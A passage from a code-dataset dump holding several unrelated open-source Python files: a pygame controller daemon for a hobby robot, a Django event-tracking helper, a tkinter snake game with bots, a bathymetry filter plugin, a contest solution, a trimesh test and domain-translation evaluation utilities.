event):\n self.button_data[event.button] = False\n\n def __set_hat(self, event):\n self.hat_data[event.hat] = event.value\n\n def set_quit(self, event=None):\n self._quit = True\n\n __METHODS = {\n pygame.JOYAXISMOTION: __set_axis,\n pygame.JOYBALLMOTION: __set_ball,\n pygame.JOYBUTTONDOWN: __set_button_down,\n pygame.JOYBUTTONUP: __set_button_up,\n pygame.JOYHATMOTION: __set_hat,\n pygame.QUIT: set_quit\n }\n\n def listen(self):\n \"\"\"\n Listen to controller events.\n \"\"\"\n if not self.is_ctrl_init:\n self._clog.error(\"The init_ctrl method must be called before \"\n \"the listen method.\")\n self.set_quit()\n\n while not self._quit:\n for event in pygame.event.get():\n self.__METHODS[event.type](self, event)\n self.process_event()\n else:\n #self._clog.warning(\"Waiting for controller\")\n time.sleep(self.event_wait_time)\n\n self._clog.info(\"Exiting\")\n\n def process_event(self):\n \"\"\"\n Process the current events. 
This method needs to be overridden.\n \"\"\"\n raise NotImplementedError(\n \"Programming error: must implement {}\".format(\n process_event.__name__))\n\n def is_ps4(self):\n \"\"\"\n Is a PS4 controller attached?\n\n .. note::\n The current way this is determined may not be reliable, but\n as of now, it's the best way I have found.\n \"\"\"\n return len(self.axis_data) == 6\n\n\nclass JoyStickControl(PYGameController, Daemon):\n \"\"\"\n This class allows control of the MonsterBorg by a PS3/4 controller.\n \"\"\"\n _LOG_PATH = os.path.join(LOG_PATH, 'mborg_pygame.log')\n _BASE_LOGGER_NAME = 'examples'\n _LOGGER_NAME = 'examples.mborg-pygame'\n _CTRL_LOGGER_NAME = 'examples.controller'\n _TBORG_LOGGER_NAME = 'examples.tborg'\n _PIDFILE = os.path.join(RUN_PATH, 'mborg_pygame.pid')\n _VOLTAGE_IN = 1.2 * 10\n _VOLTAGE_OUT = 12.0 * 0.95\n _PROCESS_INTERVAL = 0.00\n _MAX_POWER = (1.0 if _VOLTAGE_OUT > _VOLTAGE_IN\n else _VOLTAGE_OUT / float(_VOLTAGE_IN))\n _ROTATE_TURN_SPEED = 0.5\n _SLOW_SPEED = 0.5\n\n def __init__(self, bus_num=ThunderBorg.DEFAULT_BUS_NUM,\n address=ThunderBorg.DEFAULT_I2C_ADDRESS,\n log_level=logging.INFO, debug=False):\n self._debug = debug\n log_level = logging.DEBUG if debug else log_level\n cl = ConfigLogger()\n cl.config(logger_name=self._BASE_LOGGER_NAME,\n file_path=self._LOG_PATH,\n level=log_level)\n self._log = logging.getLogger(self._LOGGER_NAME)\n\n if not self._debug:\n self._tb = ThunderBorg(bus_num=bus_num,\n address=address,\n logger_name=self._TBORG_LOGGER_NAME,\n log_level=log_level)\n\n PYGameController.__init__(self, logger_name=self._CTRL_LOGGER_NAME,\n log_level=log_level, debug=debug)\n Daemon.__init__(self, self._PIDFILE, logger_name=self._LOGGER_NAME,\n verbose=2 if debug else 0)\n\n def run(self):\n \"\"\"\n Start the controller listening process.\n \"\"\"\n self.init_controller()\n\n if not self._debug:\n # Turn on failsafe.\n self._tb.set_comms_failsafe(True)\n\n if self._tb.get_comms_failsafe():\n self.log_battery_monitoring()\n self.init_mborg()\n else:\n self._clog.error(\"The failsafe mode could not be turned on.\")\n self.set_quit()\n\n try:\n self.listen()\n except (KeyboardInterrupt, ThunderBorgException) as e:\n self._log.warn(\"Exiting event processing, %s\", e)\n except Exception as e:\n self._log.error(\"Unknown error, %s\", e, exc_info=True)\n finally:\n self._tb.halt_motors()\n self._tb.set_comms_failsafe(False)\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(0, 0, 0) # Set LEDs off\n self._log.info(\"Exiting\")\n sys.exit()\n\n def log_battery_monitoring(self):\n \"\"\"\n Dump to the log the initial battery values.\n \"\"\"\n level_min, level_max = self._tb.get_battery_monitoring_limits()\n current_level = self._tb.get_battery_voltage()\n mid_level = (level_min + level_max) / 2\n buf = six.StringIO()\n buf.write(\"\\nBattery Monitoring Settings\\n\")\n buf.write(\"---------------------------\\n\")\n buf.write(\"Minimum (red) {:02.2f} V\\n\".format(level_min))\n buf.write(\"Middle (yellow) {:02.2f} V\\n\".format(mid_level))\n buf.write(\"Maximum (green) {:02.2f} V\\n\".format(level_max))\n buf.write(\"Current Voltage {:02.2f} V\\n\".format(current_level))\n self._log.info(buf.getvalue())\n buf.close()\n\n def init_mborg(self):\n \"\"\"\n Initialize the MonsterBorg joystick controller.\n \"\"\"\n self._tb.halt_motors()\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(0, 0, 1) # Set to blue\n self.event_wait_time = self._PROCESS_INTERVAL\n\n if not self.is_ctrl_init:\n self._log.warn(\"Could not 
initialize \")\n self._tb.set_comms_failsafe(False)\n self._tb.set_both_leds(0, 0, 0) # Set LEDs off\n sys.exit()\n\n self.set_defaults()\n self._tb.set_led_battery_state(True)\n self._led_battery_mode = True\n self._log.debug(\"Finished mborg_joy initialization.\")\n\n def process_event(self):\n \"\"\"\n Process the current events (overrides the base class method).\n \"\"\"\n # Invert the controller Y axis to match the motor fwd/rev.\n # If the Y axis needs to be inverted do that also.\n if self.axis_y_invert:\n motor_one = motor_two = self.axis_data.get(self.LF_UD)\n else:\n motor_one = motor_two = -self.axis_data.get(self.LF_UD)\n\n if self.axis_x_invert:\n x = -self.axis_data.get(self.RT_LR)\n else:\n x = self.axis_data.get(self.RT_LR)\n\n # Rotate turn button press\n if not self.button_data.get(self.rotate_turn_button):\n x *= self.rotate_turn_speed\n\n if x > 0.05:\n motor_one *= 1.0 - (2.0 * x)\n elif x < -0.05:\n motor_two *= 1.0 + (2.0 * x)\n\n # Drive slow button press\n if self.button_data.get(self.drive_slow_button):\n motor_one *= self.drive_slow_speed\n motor_two *= self.drive_slow_speed\n\n if not self._debug:\n self._tb.set_motor_one(motor_one * self._MAX_POWER)\n self._tb.set_motor_two(motor_two * self._MAX_POWER)\n\n # Set LEDs to purple to indicate motor faults.\n if (self._tb.get_drive_fault_one()\n or self._tb.get_drive_fault_two()):\n if self._led_battery_mode:\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(1, 0, 1) # Set to purple\n self._led_battery_mode = False\n elif not self._led_battery_mode:\n self._tb.set_led_battery_state(True)\n self._led_battery_mode = True\n\n def set_defaults(self, **kwargs):\n \"\"\"\n Set some default values. This method can be set while running. For\n example if the robot flips over which could be determined with a\n sensor the axis invert values can be changed.\n\n :param axis_y_invert: If set to `True` the up/down control is\n inverted. Default is `False`. Can be used\n if the robot flips over.\n :type axis_y_invert: bool\n :param axis_x_invert: If set to `True` the left/right control is\n inverted. Default is `False`. Can be used\n if the robot flips over.\n :type axis_x_invert: bool\n :param rotate_turn_button: Choose the button for rotation. The\n default is R1 (5).\n :type rotate_turn_button: int\n :param rotate_turn_speed: Choose the speed for rotation. The\n default is 0.5.\n :type rotate_turn_speed: float\n :param drive_slow_button: Choose the button for driving slow. 
The\n default is R2 (6).\n :type drive_slow_but: int\n :param drive_slow_speed: Choose the speed to decrease to when the\n drive-slow button is held.\n :type drive_slow_speed: bool\n \"\"\"\n tmp_kwargs = kwargs.copy()\n self.axis_y_invert = tmp_kwargs.pop('axis_y_invert', False)\n self.axis_x_invert = tmp_kwargs.pop('axis_x_invert', False)\n self.rotate_turn_button = tmp_kwargs.pop(\n 'rotate_turn_button', self.R1)\n self.rotate_turn_speed = tmp_kwargs.pop(\n 'rotate_turn_speed', self._ROTATE_TURN_SPEED)\n self.drive_slow_button = tmp_kwargs.pop(\n 'drive_slow_button', self.L1)\n self.drive_slow_speed = tmp_kwargs.pop(\n 'drive_slow_speed', self._SLOW_SPEED)\n\n if kwargs:\n self._log.error(\"Invalid arguments found: %s\", kwargs)\n\n\nif __name__ == '__main__': # pragma: no cover\n import argparse\n\n parser = argparse.ArgumentParser(\n description=(\"JoyStick Control Using PYGame\"))\n parser.add_argument(\n '-d', '--debug', action='store_true', default=False, dest='debug',\n help=\"Run in debug mode (no thunderborg code is run).\")\n parser.add_argument(\n '-s', '--start', action='store_true', default=False, dest='start',\n help=\"Start the daemon.\")\n parser.add_argument(\n '-r', '--restart', action='store_true', default=False, dest='restart',\n help=\"Restart the daemon.\")\n parser.add_argument(\n '-S', '--stop', action='store_true', default=False, dest='stop',\n help=\"Stop the daemon.\")\n options = parser.parse_args()\n arg_value = (options.start ^ options.restart ^ options.stop)\n\n if not arg_value and arg_value is not False:\n print(\"Can only set one of 'start', 'restart' or 'stop'.\")\n sys.exit(-1)\n\n if options.start:\n arg = 'start'\n elif options.restart:\n arg = 'restart'\n elif options.stop:\n arg = 'stop'\n else:\n arg = 'start'\n\n jsc = JoyStickControl(debug=options.debug)\n getattr(jsc, arg)()\n","repo_name":"cnobile2012/python-thunderborg","sub_path":"tborg/examples/mborg_pygame.py","file_name":"mborg_pygame.py","file_ext":"py","file_size_in_byte":15727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"21772467995","text":"import re\n\nfrom urllib.parse import urlparse\nfrom uuid import uuid4\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom hoop.hula import Hula\nfrom hoop.util.dates import encode_datetime\nfrom hoop.util.user_agent import is_mobile\n\nTRACKING_COOKIE_KEY = 'hoop-sid'\nTRACKING_COOKIE_MAX_AGE = 90 * 24 * 60 * 60 # 90 Days\nBOOKING_REFERER_COOKIE_KEY = 'hoop-booking-referer'\n\n# Util method for sending tracking data to Tracking Service.\n# Also sets a session_id cookie on the client\ndef track_events(request, response, events):\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n except KeyError:\n return False\n\n if not user_agent:\n return False\n\n bot_user_agent_strings = [\n 'bot',\n 'spider',\n 'facebookexternalhit',\n 'crawler',\n 'sentry',\n 'spaziodati',\n 'mediapartners',\n ]\n bot_re = '({})'.format('|'.join(bot_user_agent_strings))\n if re.search(bot_re, user_agent, re.IGNORECASE) is not None:\n return False\n\n session_id = request.COOKIES.get(TRACKING_COOKIE_KEY)\n if not session_id:\n session_id = str(uuid4())\n\n for event in events:\n event['sessionID'] = session_id\n event['systemType'] = 'Web'\n event['deviceModel'] = 'Mobile' if is_mobile(request) else 'Desktop'\n event['extra'] = user_agent\n event['id'] = str(uuid4())\n event['date'] = encode_datetime(timezone.now())\n event['appVersion'] = settings.GIT_HASH\n\n if 
event.get('screenName') is not None:\n event['screenViewURL'] = request.get_full_path()\n\n Hula().execute('tracking', 'events.add', events, background=True, version='v1')\n\n domain = request.get_host().split(':')[0]\n response.set_cookie(TRACKING_COOKIE_KEY, session_id, max_age=TRACKING_COOKIE_MAX_AGE, domain=domain)\n\n return True\n\n\ndef set_referer_cookie(request, response):\n try:\n referer_url = request.META['HTTP_REFERER']\n except KeyError:\n return\n\n domain = request.get_host().split(':')[0]\n url = urlparse(referer_url)\n response.set_cookie(BOOKING_REFERER_COOKIE_KEY, url.path + ('?' + url.query if url.query else ''), domain=domain)\n\n return True\n\ndef get_referer_from_cookie(request):\n return request.COOKIES.get(BOOKING_REFERER_COOKIE_KEY)\n","repo_name":"0x216/Hoop-Libaries","sub_path":"hoop/tracking/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17137918107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSnake is multiplayer game with bots.\n\"\"\"\n\nimport tkinter as tk\nfrom random import randint, choice\n\n\nclass Pole:\n def __init__(self, master, width, height, scale, bg='white'):\n self.master = master\n self.width = width\n self.height = height\n self.width_real = width * scale\n self.height_real = height * scale\n self.scale = scale\n self.bg = bg\n\n self.pole = tk.Canvas(self.master, width=self.width_real,\n height=self.height_real, bg=self.bg)\n self.pole.pack()\n\n self.snakes = []\n self.eats = []\n\n def get_scale(self):\n return self.scale\n\n def set_snake_bot(self, num):\n \"\"\"Add number bots\"\"\"\n for i in range(num):\n self.snakes.append(Snake_bot(self))\n for sn in self.snakes:\n if sn.typer == 'bot':\n sn.search()\n\n def set_snake_user(self, list_com_keys):\n \"\"\"Add user snake\n ---\n Parameters:\n list_com_keys - list of key left, rigth, up, down\"\"\"\n left, right, up, down = list_com_keys\n self.snakes.append(Snake(self))\n self.snakes[-1].bind_keys(left, right, up, down)\n\n def set_eats(self, num):\n for i in range(num):\n self.eats.append(Eat(self))\n\nclass Information:\n def __init__(self, master):\n self.master = master\n self.label = tk.Label(master)\n self.label.pack()\n\n def update(self, snake):\n x, y = snake.body[0].get_coords()\n length = snake.length\n speed = snake.speed\n string = 'X = {}, Y = {}, length = {}, speed = {}'.format(x, y, length, speed)\n self.label['text'] = string\n\n\nclass Elem:\n def __init__(self, pole, x, y, color='black'):\n self.pole = pole\n self.x = x\n self.y = y\n self.color = color\n self.scale = self.pole.get_scale()\n x0, y0, x1, y1 = self.real_coords()\n\n self.elem = self.pole.pole.create_rectangle(x0, y0, x1, y1, fill=color)\n\n def real_coords(self):\n x0 = self.x * self.scale + 1\n y0 = self.y * self.scale + 1\n x1 = (self.x + 1) * self.scale\n y1 = (self.y + 1) * self.scale\n return x0, y0, x1, y1\n\n def move(self, dx, dy):\n self.x += dx\n self.y += dy\n self.x = self.x % self.pole.width\n self.y = self.y % self.pole.height\n x0, y0, x1, y1 = self.real_coords()\n self.pole.pole.coords(self.elem, x0, y0, x1, y1)\n\n def check_move(self, dx, dy):\n return self.x + dx, self.y +dy\n\n def teleport(self, x, y):\n self.x = x\n self.y = y\n self.x = self.x % self.pole.width\n self.y = self.y % self.pole.height\n x0, y0, x1, y1 = self.real_coords()\n self.pole.pole.coords(self.elem, x0, y0, x1, y1)\n\n def get_coords(self):\n return self.x, self.y\n\n def 
destroy(self):\n self.pole.pole.delete(self.elem)\n\n def set_color(self, color):\n self.color = color\n self.pole.pole.itemconfig(self.elem, fill=color)\n\n\ncolor_snake = ('black', 'blue', 'cyan', 'gray', 'cyan', 'orange') * 5\n\nclass Snake:\n count = 0\n def __init__(self, pole):\n self.id = Snake.count # идентификатор объекта\n Snake.count +=1\n\n # type snake - bot or user\n self.typer = 'bot'\n\n self.pole = pole\n self.direction = 'r'\n self.speed = 10 # клеток в секунду\n self.job = None\n self.length = 1\n width = pole.width\n height = pole.height\n x = randint(0, width-1)\n y = randint(0, height-1)\n self.body = [Elem(self.pole, x, y, color=color_snake[self.id])]\n\n self.info = Information(self.pole.master)\n\n self.previos_move = [0, 0]\n\n def growth(self, eat):\n x, y = eat.get_coords()\n color = eat.color\n self.body.insert(1, Elem(self.pole, x, y, color))\n\n def move(self): # сюда засовываем еду, чтобы при поедании новый объект появлялся\n\n gameover = False # если флаг меняется, то игра останавливается\n\n dx, dy = 0, 0\n if self.direction == 'r': dx = 1\n if self.direction == 'l': dx = -1\n if self.direction == 'd': dy = 1\n if self.direction == 'u': dy = -1\n\n if self.previos_move == [dx * -1, dy * -1]:\n dx = self.previos_move[0]\n dy = self.previos_move[1]\n\n eat = True # если съел, то ключ меняется на false и движение в этом такте не происходит\n for i in range(len(self.pole.eats)):\n if self.get_coords() == self.pole.eats[i].get_coords(): # съел, удалил старый, добавил новый\n self.length += 1\n self.growth(self.pole.eats[i])\n self.pole.eats[i].destroy()\n self.pole.eats[i] = Eat(self.pole)\n eat = False\n break\n if eat:\n for i in range(len(self.body)-1, 0, -1): # от последнего элемента до второго\n x, y = self.body[i-1].get_coords()\n self.body[i].teleport(x, y)\n self.body[0].move(dx, dy) # голову отдельно перемещаем\n\n # обработка препятствия в виде своего хвоста\n for i in self.get_list_coords_tail(): # если голова попала на препятствие, то проигрыш\n if self.get_coords() == i:\n print('game over')\n self.pole.master.after_cancel(self.job)\n gameover = True\n self.set_color('red')\n break\n for sn in self.pole.snakes:\n if self.id != sn.id: # отсекаем тот же объект змеи в списке\n for i in sn.get_list_coords():\n if self.get_coords() == i:\n print('game over')\n self.pole.master.after_cancel(self.job)\n gameover = True\n self.set_color('red')\n break\n\n self.info.update(self) # обновление счета\n if gameover == False:\n self.job = self.pole.master.after(self.get_time_speed(), self.move) # записываем в переменую, чтобы потом уничтожить\n self.previos_move = [dx, dy]\n\n def direct(self, direction):\n self.direction = direction\n if self.job:\n self.pole.master.after_cancel(self.job) # штука уничтожает процесс after\n self.move()\n\n def get_coords(self):\n return self.body[0].get_coords()\n\n def get_list_coords_tail(self):\n return (i.get_coords() for i in self.body[1:])\n\n def get_list_coords(self):\n return (i.get_coords() for i in self.body)\n\n def get_time_speed(self):\n return int(1000 / self.speed)\n\n def set_color(self, color):\n for el in self.body:\n el.set_color(color)\n\n def bind_keys(self, left, right, up, down):\n \"\"\"Set key for manipulating snake and set snake as gamer type\n Key code as used in tkinter\"\"\"\n self.typer = 'user'\n self.pole.master.bind(left, lambda event: self.direct('l'))\n self.pole.master.bind(right, lambda event: self.direct('r'))\n self.pole.master.bind(up, lambda event: self.direct('u'))\n 
self.pole.master.bind(down, lambda event: self.direct('d'))\n\n\nclass Snake_bot(Snake):\n def search(self):\n xe, ye = self.pole.eats[0].get_coords()\n xs, ys = self.get_coords()\n for eat in self.pole.eats[1:]:\n xe_, ye_ = eat.get_coords()\n if abs(xe_ - xs + ye_ - ys) < abs(xe - xs + ye - xs):\n xe = xe_\n ye = ye_\n dx = xe - xs\n dy = ye - ys\n rand = randint(0,1)\n if dx == 0 and dy == 0:\n pass\n elif dx == 0:\n if dy > 0:\n self.direct('d')\n else:\n self.direct('u')\n elif dy == 0:\n if dx > 0:\n self.direct('r')\n else:\n self.direct('l')\n else:\n if rand == 0:\n if dx > 0:\n self.direct('r')\n else:\n self.direct('l')\n else:\n if dy > 0:\n self.direct('d')\n else:\n self.direct('u')\n self.pole.master.after(self.get_time_speed(), self.search)\n\n\nlst_color_eat = ('green', 'blue', 'yellow', 'pink', 'gray', 'cyan', 'orange')\nlst_color_eat =('yellow',)\n\nclass Eat:\n def __init__(self, pole):\n self.pole = pole\n self.color = choice(lst_color_eat)\n width = pole.width\n height = pole.height\n x = randint(0, width-1)\n y = randint(0, height-1)\n self.eat = Elem(self.pole, x, y, color=self.color)\n\n def destroy(self):\n self.eat.destroy()\n\n def get_coords(self):\n return self.eat.get_coords()\n\n\n\ndef main():\n\n root = tk.Tk()\n root.title('Snaюка')\n # Ititialisation game pole with width, height and scale\n pole = Pole(root, width=80, height=45, scale=20)\n # Add info frame\n info = Information(root)\n # Set number eats for snake\n pole.set_eats(20)\n # Set number bots of snake\n pole.set_snake_bot(10)\n # Add user snake and binding key for manipulating\n pole.set_snake_user(('a', 'd', 'w', 's'))\n pole.set_snake_user(('', '', '', ''))\n\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"maewec/game_snake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":10449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33425954015","text":"import numpy as np\n\nfrom HSTB.kluster.modules.filter import BaseFilter\nfrom HSTB.kluster import kluster_variables\n\n\nclass Filter(BaseFilter):\n def __init__(self, fqpr, selected_index=None):\n super().__init__(fqpr, selected_index)\n self.controls = []\n self.description = 'Re-accept all soundings that are currently rejected.'\n\n def _run_algorithm(self):\n print(f'Running reaccept_rejected on {self.fqpr.output_folder}')\n self.new_status = [] # new_status will be a list where each element is a 2d array of new detectioninfo (sounding flag) values\n for cnt, rp in enumerate(self.fqpr.multibeam.raw_ping): # for each sonar head...\n # much easier to work in 1dimension, can either go to numpy and flatten (this is more mem efficient / faster)\n rp_detect = rp['detectioninfo'].values.flatten()\n # or you can use xarray stack, which will get you the time/beam of each value, which might be useful, but can use up a lot of memory\n # rp_detect = rp['detectioninfo'].stack({'sounding': ('time', 'beam')})\n\n # where our mask is True, we set to rejected\n rp_detect[rp_detect == kluster_variables.rejected_flag] = kluster_variables.accepted_flag\n # reshape our new detectioninfo (to get back to 2d) and append to our new_status attribute\n self.new_status.append(rp_detect.reshape(rp['detectioninfo'].shape))\n print(f'reaccept_rejected 
complete')\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/plugins/filters/reaccept_rejected.py","file_name":"reaccept_rejected.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"23473704689","text":"n=int(input())\ns=input()\n\nabxy=\"ABXY\"\n\nans=1e9\n\nfor i in range(4):\n for j in range(4):\n l=abxy[i]+abxy[j]\n\n for ii in range(4):\n for jj in range(4):\n r=abxy[ii]+abxy[jj]\n\n if l == r:\n continue\n\n cnt=0\n idx=0\n\n while idx < n:\n if idx == n-1:\n cnt+=1\n break\n\n if s[idx]+s[idx+1] == l or s[idx]+s[idx+1] == r:\n idx+=2\n else:\n idx+=1\n\n cnt+=1\n\n ans=min(ans,cnt)\n\nprint(ans)\n","repo_name":"rtake/atcoder","sub_path":"arc002/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22471502067","text":"try:\n from . import generic as g\nexcept BaseException:\n import generic as g\n\n\nclass IntervalTest(g.unittest.TestCase):\n\n def test_intersection(self):\n\n pairs = g.np.array([[[0, 1], [1, 2]],\n [[1, 0], [1, 2]],\n [[0, 0], [0, 0]],\n [[10, 20], [9, 21]],\n [[5, 15], [7, 10]],\n [[5, 10], [10, 9]],\n [[0, 1], [0.9, 10]]])\n tru_hit = [False,\n False,\n False,\n True,\n True,\n True,\n True]\n tru_int = g.np.array([[0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [10, 20],\n [7, 10],\n [9, 10],\n [0.9, 1.0]])\n\n func = g.trimesh.interval.intersection\n\n # check the single- interval results\n for ab, h, i in zip(pairs, tru_hit, tru_int):\n r_h, r_i = func(*ab)\n assert g.np.allclose(r_i, i)\n assert r_h == h\n\n # check the vectorized multiple interval results\n r_h, r_i = func(pairs[:, 0, :], pairs[:, 1, :])\n assert g.np.allclose(r_h, tru_hit)\n assert g.np.allclose(r_i, tru_int)\n\n\nif __name__ == '__main__':\n g.trimesh.util.attach_to_log()\n g.unittest.main()\n","repo_name":"mikedh/trimesh","sub_path":"tests/test_interval.py","file_name":"test_interval.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":2558,"dataset":"github-code","pt":"3"} +{"seq_id":"13230157627","text":"\"\"\"\nAuthor: Talip Ucar\nEmail: ucabtuc@gmail.com\nVersion: 0.1\nDescription: Utility functions for evaluations (used in 1_eval.py)\n\"\"\"\n\nimport os\nfrom os.path import dirname, abspath\n\nimport torch as th\nimport torch.utils.data\n\nfrom utils.utils import tsne\n\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import manifold\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\ntorch.manual_seed(1)\n\n\ndef linear_model_eval_wrapper(config, Xdata, Xrecon, Xtran_to_ds1, Xtran_to_ds2, Xtran_to_ds3, clabels, dlabels_raw,\n mode, save_files=False):\n # Extract samples in each domain from the input data\n Xds1, Xds2, Xds3 = get_translated_outputs(Xdata, dlabels_raw)\n\n # Extract cohort labels in each domain from the input labels\n clabels_ds1, clabels_ds2, clabels_ds3 = get_translated_outputs(clabels, dlabels_raw)\n\n # Extract samples in each domain that are translated to ds1\n Xds1_to_ds1, Xds2_to_ds1, Xds3_to_ds1 = get_translated_outputs(Xtran_to_ds1, dlabels_raw)\n\n # Extract samples in each domain that are translated to ds2\n Xds1_to_ds2, Xds2_to_ds2, Xds3_to_ds2 = get_translated_outputs(Xtran_to_ds2, dlabels_raw)\n\n # Extract 
samples in each domain that are translated to ds3\n Xds1_to_ds3, Xds2_to_ds3, Xds3_to_ds3 = get_translated_outputs(Xtran_to_ds3, dlabels_raw)\n\n # The Linear model is trained on the raw data, and tested on reconstructed samples.\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xdata, dlabels_raw, Xrecon, dlabels_raw,\n description=\"Trained on input original domains, tested on reconstructions\")\n\n # Trained on domain 3, and tested on translation from domain 1 i.e. 1->3\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds3, clabels_ds3, Xds1_to_ds3, clabels_ds1,\n description=\"Trained on input original Domain-3, tested on translations from Domain-1\")\n\n # Trained on domain 3, and tested on translation from domain 2 i.e. 2->3\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds3, clabels_ds3, Xds2_to_ds3, clabels_ds2,\n description=\"Trained on input original Domain-3, tested on translations from Domain-2\")\n\n # Trained on domain 1, and tested on translation from domain 2 i.e. 2->1\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds1, clabels_ds1, Xds2_to_ds1, clabels_ds2,\n description=\"Trained on input original Domain-1, tested on translations from Domain-2\")\n\n # Trained on domain 2, and tested on translation from domain 1 i.e. 1->2\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds2, clabels_ds2, Xds1_to_ds2, clabels_ds1,\n description=\"Trained on input original Domain-2, tested on translations from Domain-1\")\n\n # Save translation from domain 1 -> 2, and 2 -> 1 to use them later\n if save_files:\n print(f\"Saving ds1->ds2 and ds2->ds1 translations as csv files...\")\n cl_path = \"./results/\" + config[\"framework\"] + \"/evaluation/clusters/\"\n save_np2csv([Xds1_to_ds2, clabels_ds1], save_as=cl_path + \"/ds1_to_ds2_\" + mode + \".csv\")\n save_np2csv([Xds2_to_ds1, clabels_ds2], save_as=cl_path + \"/ds2_to_ds1_\" + mode + \".csv\")\n save_np2csv([Xrecon, dlabels_raw], save_as=cl_path + \"/xrecon_dlabels_\" + mode + \".csv\")\n save_np2csv([Xrecon, clabels], save_as=cl_path + \"/xrecon_clabels_\" + mode + \".csv\")\n save_np2csv([Xdata, dlabels_raw], save_as=cl_path + \"/Xinput_dlabels_\" + mode + \".csv\")\n save_np2csv([Xdata, clabels], save_as=cl_path + \"/Xinput_clabels_\" + mode + \".csv\")\n\n\ndef translate_to_new_domain(autoencoder, config, Xdata, Xtran_to_ds3_l, ztran_to_ds3_l, to_domain=2):\n # Create labels to translate all domains to one particular domain\n dlabels_for_translation = domain_labels_for_tranlation(config, domain_label=[to_domain])\n\n # Prepare input data for translation to a particular domain\n input_data_trans = [Xdata, dlabels_for_translation] if config[\"conditional\"] else Xdata\n\n # 1st Forward pass on the Autoencoder for translation to specific domain\n Xrecon1, _, _, _ = autoencoder(input_data_trans)\n # 2nd Forward pass on the Autoencoder to get translations in latent space\n _, zt, _, _ = autoencoder([Xrecon1, dlabels_for_translation])\n\n # Save translations in reconstruction and latent space to the lists\n Xrecon1 = Xrecon1.cpu().numpy()\n zt = zt.cpu().numpy()\n\n Xtran_to_ds3_l.append(Xrecon1)\n ztran_to_ds3_l.append(zt)\n\n return Xtran_to_ds3_l, ztran_to_ds3_l\n\n\ndef linear_model_eval(X_train, y_train, X_test, y_test, use_scaler=False, description=\"Baseline: PCA + Logistic Reg.\"):\n \"\"\"\n :param ndarray 
X_train:\n :param list y_train:\n :param ndarray X_test:\n :param list y_test:\n :param bool use_scaler:\n :param str description:\n :return:\n \"\"\"\n # Initialize Logistic regression\n clf = RandomForestClassifier(\n n_estimators=100) # LogisticRegression(random_state=0, max_iter=1200, solver='lbfgs', C=0.1)\n # Fit model to the data\n clf.fit(X_train, y_train)\n # Summary of performance\n print(10 * \">\" + description)\n print(\"Train score:\", clf.score(X_train, y_train))\n print(\"Test score:\", clf.score(X_test, y_test))\n\n\ndef plot_clusters(config, z, ztran_to_ds3, clabels, dlabels_raw, plot_suffix=\"_inLatentSpace\"):\n # Number of columns for legends, where each column corresponds to a cluster/cohort\n ncol = len(list(set(clabels)))\n # dlegends = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", ...]\n dlegends = [str(i + 1) for i in range(len(list(set(dlabels_raw))))]\n # clegends = [\"A\", \"B\", \"C\", \"D\", ...]..choose first ncol characters, one per coluster\n clegends = list(\"ABCDEFGH\")[0:ncol]\n # Create new labels so that we can show cohorts and domains together. These labels will be used as keys to a dict to map to legend names\n new_labels = 4 * clabels + dlabels_raw\n\n # Show domains only\n visualise_clusters(config, z, dlabels_raw, plt_name=\"domains\" + plot_suffix, legend_title=\"Domains\",\n legend_labels=dlegends)\n # Show cohorts only\n visualise_clusters(config, z, clabels, plt_name=\"cohorts\" + plot_suffix, legend_title=\"Cohorts\",\n legend_labels=clegends)\n # Show both cohorts and domains\n visualise_clusters(config, z, new_labels, plt_name=\"domain_cohorts\" + plot_suffix, alpha=1.0,\n legend_title=\"Cohorts/Domains\", ncol=ncol)\n\n # Plot translations from all domains to a particular domain (e.g. ds3)\n # Show both cohorts and domains\n visualise_clusters(config, ztran_to_ds3, new_labels, plt_name=\"domains_cohorts_translations\" + plot_suffix,\n alpha=1.0, legend_title=\"Cohorts/Domains\", ncol=ncol)\n # Show domains only\n visualise_clusters(config, ztran_to_ds3, dlabels_raw, plt_name=\"domains_translations\" + plot_suffix,\n legend_title=\"Domains\", legend_labels=dlegends)\n\n\ndef visualise_clusters(config, embeddings, labels, plt_name=\"test\", alpha=1.0, legend_title=None, legend_labels=None,\n ncol=1):\n \"\"\"\n :param ndarray embeddings: Latent representations of samples.\n :param ndarray labels: Class labels;\n :param plt_name: Name to be used when saving the plot.\n :return: None\n \"\"\"\n # Define colors to be used for each class/cluster/cohort\n color_list = ['#66BAFF', '#FFB56B', '#8BDD89', '#faa5f3', '#fa7f7f',\n '#008cff', '#ff8000', '#04b000', '#de4bd2', '#fc3838',\n '#004c8b', \"#964b00\", 